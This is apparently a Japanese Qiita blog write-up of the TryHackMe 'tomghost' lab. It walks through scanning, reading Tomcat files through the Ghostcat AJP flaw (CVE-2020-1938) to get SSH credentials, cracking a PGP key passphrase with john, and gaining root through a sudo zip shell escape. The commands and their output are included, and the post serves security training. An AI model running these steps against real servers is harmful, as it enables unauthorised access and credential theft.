LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@TUDANUMA

[TryHackMe] tomghost #Writeup

Posted at

はじめに

備忘録です。

Compromise this machine and obtain user.txt

nmapでポートスキャン。

$ nmap 10.10.68.1

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-18 06:47 BST
Nmap scan report for ip-10-10-68-1.eu-west-1.compute.internal (10.10.68.1)
Host is up (0.00036s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:65:81:20:88:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

8080ポートでApache Tomcatが稼働していました。
gobusterで隠しディレクトリを探す。

$ gobuster dir -u http://10.10.68.1:8080 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.68.1:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/18 07:09:20 Starting gobuster
===============================================================
/docs (Status: 302)
/examples (Status: 302)
/favicon.ico (Status: 200)
/host-manager (Status: 302)
/manager (Status: 302)
===============================================================
2024/07/18 07:09:23 Finished
===============================================================

ページをいろいろと探索してみましたが、めぼしいものはありませんでした。
Tomcat 9.0.30 を使用しているので、これの脆弱性について調べていきます。

CVSSが9.8のやべーやつが見つかりました。

調べていたら、CVE-2020-1938は通称「Ghostcat」と呼ばれているみたい。

これを使用できないか試してみます。
まず、ダウンロード。

wget https://raw.githubusercontent.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat/main/CVE-2020-1938.py

この説明通り使います。

$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Traceback (most recent call last):
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 295, in <module>
    t = Tomcat(args.target, args.port)
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 262, in __init__
    self.stream = self.socket.makefile("rb", bufsize=0)
TypeError: makefile() got an unexpected keyword argument 'bufsize'

エラーが出たので、
self.stream = self.socket.makefile("rb", 0)
に書き換えました。

python CVE-2020-1938.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.68.1:8009/asdf
----------------------------
Traceback (most recent call last):
  File "CVE-2020-1938.py", line 301, in <module>
    print("".join([d.data for d in data]))
TypeError: sequence item 0: expected str instance, bytes found

再度エラーが出たので、
print(b"".join([d.data for d in data]))
に書き換えました。

$ python CVE-2020-1938.py 10.10.68.1 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.68.1:8009/asdf
----------------------------
b'<?xml version="1.0" encoding="UTF-8"?>\n<!--\n Licensed to the Apache Software Foundation (ASF) under one or more\n  contributor license agreements.  See the NOTICE file distributed with\n  this work for additional information regarding copyright ownership.\n  The ASF licenses this file to You under the Apache License, Version 2.0\n  (the "License"); you may not use this file except in compliance with\n  the License.  You may obtain a copy of the License at\n\n      http://www.apache.org/licenses/LICENSE-2.0\n\n  Unless required by applicable law or agreed to in writing, software\n  distributed under the License is distributed on an "AS IS" BASIS,\n  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n  See the License for the specific language governing permissions and\n  limitations under the License.\n-->\n<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"\n  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee\n                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"\n  version="4.0"\n  metadata-complete="true">\n\n  <display-name>Welcome to Tomcat</display-name>\n  <description>\n     Welcome to GhostCat\n\tskyfuck:8730281lkjlkjdqlksalks\n  </description>\n\n</web-app>\n\x00'

skyfuck:8730281lkjlkjdqlksalks
パスワードとユーザー名をゲットしました。

$ ssh skyfuck@10.10.68.1
The authenticity of host '10.10.68.1 (10.10.68.1)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.68.1' (ECDSA) to the list of known hosts.
skyfuck@10.10.68.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

skyfuck@ubuntu:~$

ssh接続に成功した。
user.txtを探す。

$ find / -name user.txt 2> /dev/null
/home/merlin/user.txt

user.txtをゲット!

Escalate privileges and obtain root.txt

sudo -lを試す。

$ sudo -l
[sudo] password for skyfuck: 
Sorry, user skyfuck may not run sudo on ubuntu.

ダメだった。

$ ls
credential.pgp  tryhackme.asc

skyfuckのディレクトリにあった二つのファイルを確認する。

tryhackme.ascの中身はcredential.pgpの公開鍵だった。
鍵をクラックして、credential.pgpの中を見たい。

復号のため、ローカルにtryhackme.ascをコピーして持ってくる。

$ scp skyfuck@10.10.68.1:tryhackme.asc tryhackme.asc
skyfuck@10.10.68.1's password: 
tryhackme.asc                                 100% 5144     1.9MB/s   00:00

johntheripperでクラックしたいので、鍵をjohnの形に変換する。

$ gpg2john tryhackme.asc > hash.txt

File tryhackme.asc

johnでクラックする。

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl"
Use the "--format=gpg-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2024-07-18 08:37) 6.250g/s 6700p/s 6700c/s 6700C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

パスワードがわかったので、credential.pgpを見てみる。

$ gpg --import tryhackme.asc
gpg: directory `/home/skyfuck/.gnupg' created
gpg: new configuration file `/home/skyfuck/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/skyfuck/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/skyfuck/.gnupg/secring.gpg' created
gpg: keyring `/home/skyfuck/.gnupg/pubring.gpg' created
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

merlinのパスワードがわかった。

$ ssh merlin@10.10.68.1
merlin@10.10.68.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$

sshの接続に成功した。

$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

zipコマンドが管理者権限で実行できる。

gtfobinsで調べたコマンドを使用。

$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# sudo rm $TF
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# cat /root/root.txt
THM{**********}

root.txtゲット!!

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?